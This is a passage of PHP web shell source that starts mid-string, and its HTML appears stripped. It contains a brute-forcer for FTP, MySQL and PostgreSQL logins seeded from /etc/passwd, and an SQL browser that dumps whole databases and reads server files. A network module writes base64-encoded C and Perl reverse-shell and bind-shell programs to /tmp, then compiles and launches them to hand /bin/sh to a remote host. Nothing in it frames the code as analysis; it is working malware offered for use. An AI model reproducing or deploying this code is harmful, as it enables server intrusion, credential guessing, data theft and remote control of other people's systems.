';if($_POST['proto']=='ftp'){function bruteForce($ip,$port,$login,$pass){$fp=@ftp_connect($ip,$port?$port:21);if(!$fp)return false;$res=@ftp_login($fp,$login,$pass);@ftp_close($fp);return$res;}}elseif($_POST['proto']=='mysql'){function bruteForce($ip,$port,$login,$pass){$res=@mysql_connect($ip.':'.($port?$port:3306),$login,$pass);@mysql_close($res);return$res;}}elseif($_POST['proto']=='pgsql'){function bruteForce($ip,$port,$login,$pass){$str="host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";$res=@pg_connect($str);@pg_close($res);return$res;}}$success=0;$attempts=0;$server=explode(":",$_POST['server']);if($_POST['type']==1){$temp=@file('/etc/passwd');if(is_array($temp))foreach($temp as$line){$line=explode(":",$line);++$attempts;if(bruteForce(@$server[0],@$server[1],$line[0],$line[0])){$success++;echo''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
';}if(@$_POST['reverse']){$tmp="";for($i=strlen($line[0])-1;$i>=0;--$i)$tmp.=$line[0][$i];++$attempts;if(bruteForce(@$server[0],@$server[1],$line[0],$tmp)){$success++;echo''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp);}}}}elseif($_POST['type']==2){$temp=@file($_POST['dict']);if(is_array($temp))foreach($temp as$line){$line=trim($line);++$attempts;if(bruteForce($server[0],@$server[1],$_POST['login'],$line)){$success++;echo''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
';}}}echo"Attempts: ".$attempts." Success: ".$success."

";}echo'

FTP bruteforce

'.''.''.''.''.''.''.'
Type
'.''.''.''.''.'Server:port
Brute type /etc/passwd
reverse (login -> nigol)
Dictionary
'.''.''.'
Login
Dictionary
'.'
';echo'
';hardFooter();}function actionSql(){class DbClass{public$type;public$link;public$res;function DbClass($type){$this->type=$type;}function connect($host,$user,$pass,$dbname){switch($this->type){case 'mysql':if($this->link=@mysql_connect($host,$user,$pass,true))return true;break;case 'pgsql':$host=explode(':',$host);if(!$host[1])$host[1]=5432;if($this->link=@pg_connect("host=".$host[0]." port=".$host[1]." user=".$user." password=".$pass." dbname=".$dbname))return true;break;}return false;}function selectdb($db){switch($this->type){case 'mysql':if(@mysql_select_db($db))return true;break;}return false;}function query($str){switch($this->type){case 'mysql':return$this->res=@mysql_query($str);break;case 'pgsql':return$this->res=@pg_query($this->link,$str);break;}return false;}function fetch(){$res=func_num_args()?func_get_arg(0):$this->res;switch($this->type){case 'mysql':return @mysql_fetch_assoc($res);break;case 'pgsql':return @pg_fetch_assoc($res);break;}return false;}function listDbs(){switch($this->type){case 'mysql':return$this->query("SHOW databases");break;case 'pgsql':return$this->res=$this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");break;}return false;}function listTables(){switch($this->type){case 'mysql':return$this->res=$this->query('SHOW TABLES');break;case 'pgsql':return$this->res=$this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");break;}return false;}function error(){switch($this->type){case 'mysql':return @mysql_error();break;case 'pgsql':return @pg_last_error();break;}return false;}function setCharset($str){switch($this->type){case 'mysql':if(function_exists('mysql_set_charset'))return @mysql_set_charset($str,$this->link);else $this->query('SET CHARSET '.$str);break;case 'pgsql':return @pg_set_client_encoding($this->link,$str);break;}return false;}function loadFile($str){switch($this->type){case 'mysql':return$this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));break;case 'pgsql':$this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;");$r=array();while($i=$this->fetch())$r[]=$i['file'];$this->query('drop table hard2');return array('file'=>implode("\n",$r));break;}return false;}function dump($table,$fp=false){switch($this->type){case 'mysql':$res=$this->query('SHOW CREATE TABLE `'.$table.'`');$create=mysql_fetch_array($res);$sql=$create[1].";\n";if($fp)fwrite($fp,$sql);else echo($sql);$this->query('SELECT * FROM `'.$table.'`');$i=0;$head=true;while($▟=$this->fetch()){$sql='';if($i%1000==0){$head=true;$sql=";\n\n";}$columns=array();foreach($▟ as$k=>$v){if($v===null)$▟[$k]="NULL";elseif(is_int($v))$▟[$k]=$v;else $▟[$k]="'".@mysql_real_escape_string($v)."'";$columns[]="`".$k."`";}if($head){$sql.='INSERT INTO `'.$table.'` ('.implode(", ",$columns).") VALUES \n\t(".implode(", ",$▟).')';$head=false;}else $sql.="\n\t,(".implode(", ",$▟).')';if($fp)fwrite($fp,$sql);else echo($sql);$i++;}if(!$head)if($fp)fwrite($fp,";\n\n");else echo(";\n\n");break;case 'pgsql':$this->query('SELECT * FROM '.$table);while($▟=$this->fetch()){$columns=array();foreach($▟ as$k=>$v){$▟[$k]="'".addslashes($v)."'";$columns[]=$k;}$sql='INSERT INTO '.$table.' ('.implode(", ",$columns).') VALUES ('.implode(", ",$▟).');'."\n";if($fp)fwrite($fp,$sql);else echo($sql);}break;}return false;}};$db=new DbClass($_POST['type']);if((@$_POST['p2']=='download')&&(@$_POST['p1']!='select')){$db->connect($_POST['sql_host'],$_POST['sql_login'],$_POST['sql_pass'],$_POST['sql_base']);$db->selectdb($_POST['sql_base']);switch($_POST['charset']){case "Windows-1251":$db->setCharset('cp1251');break;case "UTF-8":$db->setCharset('utf8');break;case "KOI8-R":$db->setCharset('koi8r');break;case "KOI8-U":$db->setCharset('koi8u');break;case "cp866":$db->setCharset('cp866');break;}if(empty($_POST['file'])){ob_start("ob_gzhandler",4096);header("Content-Disposition: attachment; filename=dump.sql");header("Content-Type: text/plain");foreach($_POST['tbl'] as$v)$db->dump($v);exit;}elseif($fp=@fopen($_POST['file'],'w')){foreach($_POST['tbl'] as$v)$db->dump($v,$fp);fclose($fp);unset($_POST['p2']);}else die('');}hardHeader();echo"

Sql browser

TypeHostLoginPasswordDatabase
";$tmp="";if(isset($_POST['sql_host'])){if($db->connect($_POST['sql_host'],$_POST['sql_login'],$_POST['sql_pass'],$_POST['sql_base'])){switch($_POST['charset']){case "Windows-1251":$db->setCharset('cp1251');break;case "UTF-8":$db->setCharset('utf8');break;case "KOI8-R":$db->setCharset('koi8r');break;case "KOI8-U":$db->setCharset('koi8u');break;case "cp866":$db->setCharset('cp866');break;}$db->listDbs();echo"';}else echo$tmp;}else echo$tmp;echo" count the number of rows
";if(isset($db)&&$db->link){echo"
";if(!empty($_POST['sql_base'])){$db->selectdb($_POST['sql_base']);echo"";}echo"
Tables:

";$tbls_res=$db->listTables();while($▟=$db->fetch($tbls_res)){list($key,$value)=each($▟);if(!empty($_POST['sql_count']))$n=$db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));$value=htmlspecialchars($value);echo" ".$value."".(empty($_POST['sql_count'])?' ':" (".$n['n'].")")."
";}echo"
File path:		";if(@$_POST['p1']=='select'){$_POST['p1']='query';$_POST['p3']=$_POST['p3']?$_POST['p3']:1;$db->query('SELECT COUNT(*) as n FROM '.$_POST['p2']);$num=$db->fetch();$pages=ceil($num['n']/30);echo"".$_POST['p2']." (".$num['n']." records) Page # ";echo" of ".$pages;if($_POST['p3']>1)echo" < Prev";if($_POST['p3']<$pages)echo" Next >";$_POST['p3']--;if($_POST['type']=='pgsql')$_POST['p2']='SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);else $_POST['p2']='SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';echo"

";}if((@$_POST['p1']=='query')&&!empty($_POST['p2'])){$db->query(@$_POST['p2']);if($db->res!==false){$title=false;echo'';$line=1;while($▟=$db->fetch()){if(!$title){echo'';foreach($▟ as$key=>$value)echo'';reset($▟);$title=true;echo'';$line=2;}echo'';$line=$line==1?2:1;foreach($▟ as$key=>$value){if($value==null)echo'';else echo'';}echo'';}echo'
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
';}else{echo'
Error: '.htmlspecialchars($db->error()).'
';}}echo"

";echo"

";if($_POST['type']=='mysql'){$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");if($db->fetch())echo"
Load file
";}if(@$_POST['p1']=='loadfile'){$file=$db->loadFile($_POST['p2']);echo'
'.htmlspecialchars($file['file']).'
';}}else{echo htmlspecialchars($db->error());}echo'
';hardFooter();}function actionNetwork(){hardHeader();$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";echo"

Network tools

Bind port to /bin/sh
Port: Password: Using:
Back-connect to
Server: Port: Using:

";if(isset($_POST['p1'])){function cf($f,$t){$w=@fopen($f,"w") or @function_exists('file_put_contents');if($w){@fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));@fclose($w);}}if($_POST['p1']=='bpc'){cf("/tmp/bp.c",$bind_port_c);$▖=ex("gcc -o /tmp/bp /tmp/bp.c");@unlink("/tmp/bp.c");$▖.=ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");echo"
".$▖.ex("ps aux | grep bp")."
";}if($_POST['p1']=='bpp'){cf("/tmp/bp.pl",$bind_port_p);$▖=ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");echo"
".$▖.ex("ps aux | grep bp.pl")."
";}if($_POST['p1']=='bcc'){cf("/tmp/bc.c",$back_connect_c);$▖=ex("gcc -o /tmp/bc /tmp/bc.c");@unlink("/tmp/bc.c");$▖.=ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");echo"
".$▖.ex("ps aux | grep bc")."
";}if($_POST['p1']=='bcp'){cf("/tmp/bc.pl",$back_connect_p);$▖=ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");echo"
".$▖.ex("ps aux | grep bc.pl")."
";}}echo'
';hardFooter();}if(empty($_POST['a']))if(isset($▚)&&function_exists('action'.$▚))$_POST['a']=$▚;else $_POST['a']='FilesMan';if(!empty($_POST['a'])&&function_exists('action'.$_POST['a']))call_user_func('action'.$_POST['a']);;